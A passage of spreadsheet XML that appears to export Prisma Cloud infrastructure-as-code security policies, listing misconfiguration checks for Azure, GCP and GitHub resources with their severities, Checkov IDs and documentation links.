      <c r="N1397" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1397" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1397" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1397" t="inlineStr"/>
      <c r="R1397" t="inlineStr"/>
      <c r="S1397" t="inlineStr"/>
      <c r="T1397" t="b">
        <v>0</v>
      </c>
      <c r="U1397" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1397" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W1397" t="inlineStr">
        <is>
          <t>Ensure that Azure Synapse workspaces have no IP firewall rules attached</t>
        </is>
      </c>
      <c r="X1397" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached</t>
        </is>
      </c>
      <c r="Y1397" t="inlineStr"/>
      <c r="Z1397" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_synapse_workspace"]}</t>
        </is>
      </c>
      <c r="AA1397" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1397" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1397" t="inlineStr">
        <is>
          <t>CKV2_AZURE_19</t>
        </is>
      </c>
      <c r="AD1397" t="b">
        <v>1</v>
      </c>
      <c r="AE1397" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1397" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>505eef98-6fa3-4982-908a-991d8870e54a</t>
        </is>
      </c>
      <c r="AI1397" t="inlineStr"/>
      <c r="AJ1397" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1397" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" t="inlineStr"/>
      <c r="B1398" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1398" s="2" t="inlineStr"/>
      <c r="D1398" t="inlineStr"/>
      <c r="E1398" t="inlineStr"/>
      <c r="F1398" t="inlineStr"/>
      <c r="G1398" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1398" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-synapse</t>
        </is>
      </c>
      <c r="K1398" t="inlineStr">
        <is>
          <t>Azure Synapse Workspaces do not enable managed virtual networks</t>
        </is>
      </c>
      <c r="L1398" t="inlineStr"/>
      <c r="M1398" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1398" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1398" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1398" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1398" t="inlineStr"/>
      <c r="R1398" t="inlineStr"/>
      <c r="S1398" t="inlineStr"/>
      <c r="T1398" t="b">
        <v>0</v>
      </c>
      <c r="U1398" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1398" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W1398" t="inlineStr">
        <is>
          <t>Ensure that Azure Synapse workspaces enables managed virtual networks</t>
        </is>
      </c>
      <c r="X1398" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks</t>
        </is>
      </c>
      <c r="Y1398" t="inlineStr"/>
      <c r="Z1398" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_synapse_workspace"]}</t>
        </is>
      </c>
      <c r="AA1398" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1398" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1398" t="inlineStr">
        <is>
          <t>CKV_AZURE_58</t>
        </is>
      </c>
      <c r="AD1398" t="b">
        <v>1</v>
      </c>
      <c r="AE1398" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1398" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>83494f5a-bfc0-418d-8b68-3bb20e5e4505</t>
        </is>
      </c>
      <c r="AI1398" t="inlineStr"/>
      <c r="AJ1398" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1398" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" t="inlineStr"/>
      <c r="B1399" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1399" s="2" t="inlineStr"/>
      <c r="D1399" t="inlineStr"/>
      <c r="E1399" t="inlineStr"/>
      <c r="F1399" t="inlineStr"/>
      <c r="G1399" t="b">
        <v>1</v>
      </c>
      <c r="H13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399" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1399" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-virtual</t>
        </is>
      </c>
      <c r="K1399" t="inlineStr">
        <is>
          <t>VNET Using External DNS Addresses</t>
        </is>
      </c>
      <c r="L1399" t="inlineStr"/>
      <c r="M1399" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1399" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1399" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1399" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1399" t="inlineStr"/>
      <c r="R1399" t="inlineStr"/>
      <c r="S1399" t="inlineStr"/>
      <c r="T1399" t="b">
        <v>0</v>
      </c>
      <c r="U1399" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1399" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-virtual-network</t>
        </is>
      </c>
      <c r="W1399" t="inlineStr">
        <is>
          <t>Ensure that VNET uses local DNS addresses</t>
        </is>
      </c>
      <c r="X1399" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-183</t>
        </is>
      </c>
      <c r="Y1399" t="inlineStr"/>
      <c r="Z1399" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_virtual_network"]}</t>
        </is>
      </c>
      <c r="AA1399" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1399" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1399" t="inlineStr">
        <is>
          <t>CKV_AZURE_183</t>
        </is>
      </c>
      <c r="AD1399" t="b">
        <v>1</v>
      </c>
      <c r="AE1399" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1399" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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399" t="inlineStr">
        <is>
          <t>c2d65566-f018-4792-941c-0ce29164639a</t>
        </is>
      </c>
      <c r="AI1399" t="inlineStr"/>
      <c r="AJ1399" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1399" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" t="inlineStr"/>
      <c r="B1400" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1400" s="2" t="inlineStr"/>
      <c r="D1400" t="inlineStr"/>
      <c r="E1400" t="inlineStr"/>
      <c r="F1400" t="inlineStr"/>
      <c r="G1400" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1400" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-virtual</t>
        </is>
      </c>
      <c r="K1400" t="inlineStr">
        <is>
          <t>VNET With Only One DNS Endpoint</t>
        </is>
      </c>
      <c r="L1400" t="inlineStr"/>
      <c r="M1400" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1400" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1400" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1400" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1400" t="inlineStr"/>
      <c r="R1400" t="inlineStr"/>
      <c r="S1400" t="inlineStr"/>
      <c r="T1400" t="b">
        <v>0</v>
      </c>
      <c r="U1400" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1400" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-virtual-network,azure-virtual-network-dns-servers</t>
        </is>
      </c>
      <c r="W1400" t="inlineStr">
        <is>
          <t>Ensure that VNET has at least 2 connected DNS Endpoints</t>
        </is>
      </c>
      <c r="X1400" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-182</t>
        </is>
      </c>
      <c r="Y1400" t="inlineStr"/>
      <c r="Z1400" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_virtual_network","azurerm_virtual_network_dns_servers"]}</t>
        </is>
      </c>
      <c r="AA1400" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1400" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1400" t="inlineStr">
        <is>
          <t>CKV_AZURE_182</t>
        </is>
      </c>
      <c r="AD1400" t="b">
        <v>1</v>
      </c>
      <c r="AE1400" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1400" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>ff3711c2-738a-42ed-96a1-d96534ef45b9</t>
        </is>
      </c>
      <c r="AI1400" t="inlineStr"/>
      <c r="AJ1400" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1400" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" t="inlineStr"/>
      <c r="B1401" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1401" s="2" t="inlineStr"/>
      <c r="D1401" t="inlineStr"/>
      <c r="E1401" t="inlineStr"/>
      <c r="F1401" t="inlineStr"/>
      <c r="G1401" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1401" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-web</t>
        </is>
      </c>
      <c r="K1401" t="inlineStr">
        <is>
          <t>Application gateway does not use WAF in Detection or Prevention modes</t>
        </is>
      </c>
      <c r="L1401" t="inlineStr"/>
      <c r="M1401" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1401" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1401" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1401" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1401" t="inlineStr"/>
      <c r="R1401" t="inlineStr"/>
      <c r="S1401" t="inlineStr"/>
      <c r="T1401" t="b">
        <v>0</v>
      </c>
      <c r="U1401" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1401" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-web-application-firewall-policy</t>
        </is>
      </c>
      <c r="W1401" t="inlineStr">
        <is>
          <t>Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes</t>
        </is>
      </c>
      <c r="X1401" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes</t>
        </is>
      </c>
      <c r="Y1401" t="inlineStr"/>
      <c r="Z1401" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_web_application_firewall_policy"]}</t>
        </is>
      </c>
      <c r="AA1401" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1401" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1401" t="inlineStr">
        <is>
          <t>CKV_AZURE_122</t>
        </is>
      </c>
      <c r="AD1401" t="b">
        <v>1</v>
      </c>
      <c r="AE1401" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1401" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>3dc2478c-bf25-4383-aaa1-30feb5cda586</t>
        </is>
      </c>
      <c r="AI1401" t="inlineStr"/>
      <c r="AJ1401" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1401" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" t="inlineStr"/>
      <c r="B1402" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1402" s="2" t="inlineStr"/>
      <c r="D1402" t="inlineStr"/>
      <c r="E1402" t="inlineStr"/>
      <c r="F1402" t="inlineStr"/>
      <c r="G1402" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1402" t="inlineStr">
        <is>
          <t>IaC:Networking:github-repository</t>
        </is>
      </c>
      <c r="K1402" t="inlineStr">
        <is>
          <t>GitHub repository webhook defined in Terraform does not use a secure SSL</t>
        </is>
      </c>
      <c r="L1402" t="inlineStr"/>
      <c r="M1402" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1402" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1402" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1402" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1402" t="inlineStr"/>
      <c r="R1402" t="inlineStr"/>
      <c r="S1402" t="inlineStr"/>
      <c r="T1402" t="b">
        <v>0</v>
      </c>
      <c r="U1402" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1402" t="inlineStr">
        <is>
          <t>IaC:Networking:github-repository-webhook</t>
        </is>
      </c>
      <c r="W1402" t="inlineStr">
        <is>
          <t>Ensure GitHub repository webhooks are using HTTPS</t>
        </is>
      </c>
      <c r="X1402" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/github-policies/github-2</t>
        </is>
      </c>
      <c r="Y1402" t="inlineStr"/>
      <c r="Z1402" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["github_repository_webhook"]}</t>
        </is>
      </c>
      <c r="AA1402" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1402" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1402" t="inlineStr">
        <is>
          <t>CKV_GIT_2</t>
        </is>
      </c>
      <c r="AD1402" t="b">
        <v>1</v>
      </c>
      <c r="AE1402" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1402" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>ecb41bbe-ffb3-46d6-878b-aa3240b101a8</t>
        </is>
      </c>
      <c r="AI1402" t="inlineStr"/>
      <c r="AJ1402" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1402" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" t="inlineStr"/>
      <c r="B1403" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1403" s="2" t="inlineStr"/>
      <c r="D1403" t="inlineStr"/>
      <c r="E1403" t="inlineStr"/>
      <c r="F1403" t="inlineStr"/>
      <c r="G1403" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1403" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1403" t="inlineStr">
        <is>
          <t>GCP Google compute firewall ingress allow FTP port (20) access</t>
        </is>
      </c>
      <c r="L1403" t="inlineStr"/>
      <c r="M1403" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1403" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1403" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1403" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1403" t="inlineStr"/>
      <c r="R1403" t="inlineStr"/>
      <c r="S1403" t="inlineStr"/>
      <c r="T1403" t="b">
        <v>0</v>
      </c>
      <c r="U1403" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1403" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-firewall</t>
        </is>
      </c>
      <c r="W1403" t="inlineStr">
        <is>
          <t>Ensure Google compute firewall ingress does not allow on ftp port</t>
        </is>
      </c>
      <c r="X1403" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access</t>
        </is>
      </c>
      <c r="Y1403" t="inlineStr"/>
      <c r="Z1403" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA1403" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1403" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1403" t="inlineStr">
        <is>
          <t>CKV_GCP_77</t>
        </is>
      </c>
      <c r="AD1403" t="b">
        <v>1</v>
      </c>
      <c r="AE1403" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1403" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>f7eab932-e3bb-47aa-82d1-104f22fe1581</t>
        </is>
      </c>
      <c r="AI1403" t="inlineStr"/>
      <c r="AJ1403" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1403" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" t="inlineStr"/>
      <c r="B1404" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1404" s="2" t="inlineStr"/>
      <c r="D1404" t="inlineStr"/>
      <c r="E1404" t="inlineStr"/>
      <c r="F1404" t="inlineStr"/>
      <c r="G1404" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1404" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1404" t="inlineStr">
        <is>
          <t>GCP VM instances do have block project-wide SSH keys feature disabled</t>
        </is>
      </c>
      <c r="L1404" t="inlineStr"/>
      <c r="M1404" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1404" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1404" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1404" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1404" t="inlineStr"/>
      <c r="R1404" t="inlineStr"/>
      <c r="S1404" t="inlineStr"/>
      <c r="T1404" t="b">
        <v>0</v>
      </c>
      <c r="U1404" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1404" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-instance</t>
        </is>
      </c>
      <c r="W1404" t="inlineStr">
        <is>
          <t>Ensure 'Block Project-wide SSH keys' is enabled for VM instances</t>
        </is>
      </c>
      <c r="X1404" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8</t>
        </is>
      </c>
      <c r="Y1404" t="inlineStr"/>
      <c r="Z1404" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA1404" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1404" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1404" t="inlineStr">
        <is>
          <t>CKV_GCP_32</t>
        </is>
      </c>
      <c r="AD1404" t="b">
        <v>1</v>
      </c>
      <c r="AE1404" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1404" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>34acea4f-dacf-477d-9d96-3dcc9f29ed41</t>
        </is>
      </c>
      <c r="AI1404" t="inlineStr"/>
      <c r="AJ1404" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1404" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" t="inlineStr"/>
      <c r="B1405" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1405" s="2" t="inlineStr"/>
      <c r="D1405" t="inlineStr"/>
      <c r="E1405" t="inlineStr"/>
      <c r="F1405" t="inlineStr"/>
      <c r="G1405" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1405" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1405" t="inlineStr">
        <is>
          <t>Google Cloud Platform network is not ensured to define a firewall</t>
        </is>
      </c>
      <c r="L1405" t="inlineStr"/>
      <c r="M1405" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1405" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1405" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1405" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1405" t="inlineStr"/>
      <c r="R1405" t="inlineStr"/>
      <c r="S1405" t="inlineStr"/>
      <c r="T1405" t="b">
        <v>0</v>
      </c>
      <c r="U1405" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1405" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-network</t>
        </is>
      </c>
      <c r="W1405" t="inlineStr">
        <is>
          <t>Ensure GCP network defines a firewall and does not use the default firewall</t>
        </is>
      </c>
      <c r="X1405" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-2-18</t>
        </is>
      </c>
      <c r="Y1405" t="inlineStr"/>
      <c r="Z1405" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_network"]}</t>
        </is>
      </c>
      <c r="AA1405" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1405" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1405" t="inlineStr">
        <is>
          <t>CKV2_GCP_18</t>
        </is>
      </c>
      <c r="AD1405" t="b">
        <v>1</v>
      </c>
      <c r="AE1405" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1405" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>ff0cddec-1bf3-4bdd-a8e9-a988620792f0</t>
        </is>
      </c>
      <c r="AI1405" t="inlineStr"/>
      <c r="AJ1405" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1405" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" t="inlineStr"/>
      <c r="B1406" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1406" s="2" t="inlineStr"/>
      <c r="D1406" t="inlineStr"/>
      <c r="E1406" t="inlineStr"/>
      <c r="F1406" t="inlineStr"/>
      <c r="G1406" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1406" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1406" t="inlineStr">
        <is>
          <t>[Charles Schwab] GCP Projects do have OS Login disabled</t>
        </is>
      </c>
      <c r="L1406" t="inlineStr"/>
      <c r="M1406" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1406" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1406" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1406" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1406" t="inlineStr"/>
      <c r="R1406" t="inlineStr"/>
      <c r="S1406" t="inlineStr"/>
      <c r="T1406" t="b">
        <v>0</v>
      </c>
      <c r="U1406" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1406" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute-project-metadata</t>
        </is>
      </c>
      <c r="W1406" t="inlineStr">
        <is>
          <t>Ensure oslogin is enabled for a Project</t>
        </is>
      </c>
      <c r="X1406" t="inlineStr"/>
      <c r="Y1406" t="inlineStr"/>
      <c r="Z1406" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["google_compute_project_metadata"],"conditionQuery":{"attribute":"metadata","operator":"equals","value":"enable-oslogin","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1406" t="inlineStr">
        <is>
          <t>William Mora</t>
        </is>
      </c>
      <c r="AB1406" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1406" t="inlineStr"/>
      <c r="AD1406" t="b">
        <v>0</v>
      </c>
      <c r="AE1406" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1406" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>839614d8-8b26-4acc-b857-c23589590cba</t>
        </is>
      </c>
      <c r="AI1406" t="inlineStr"/>
      <c r="AJ1406" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1406" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" t="inlineStr"/>
      <c r="B1407" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1407" s="2" t="inlineStr"/>
      <c r="D1407" t="inlineStr"/>
      <c r="E1407" t="inlineStr"/>
      <c r="F1407" t="inlineStr"/>
      <c r="G1407" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1407" t="inlineStr">
        <is>
          <t>IaC:Networking:google-compute</t>
        </is>
      </c>
      <c r="K1407" t="inlineStr">
        <is>
          <t>GCP Projects do have OS Login disabled</t>
        </is>
      </c>
      <c r="L1407" t="inlineStr"/>
      <c r="M1407" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1407" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1407" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1407" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1407" t="inlineStr"/>
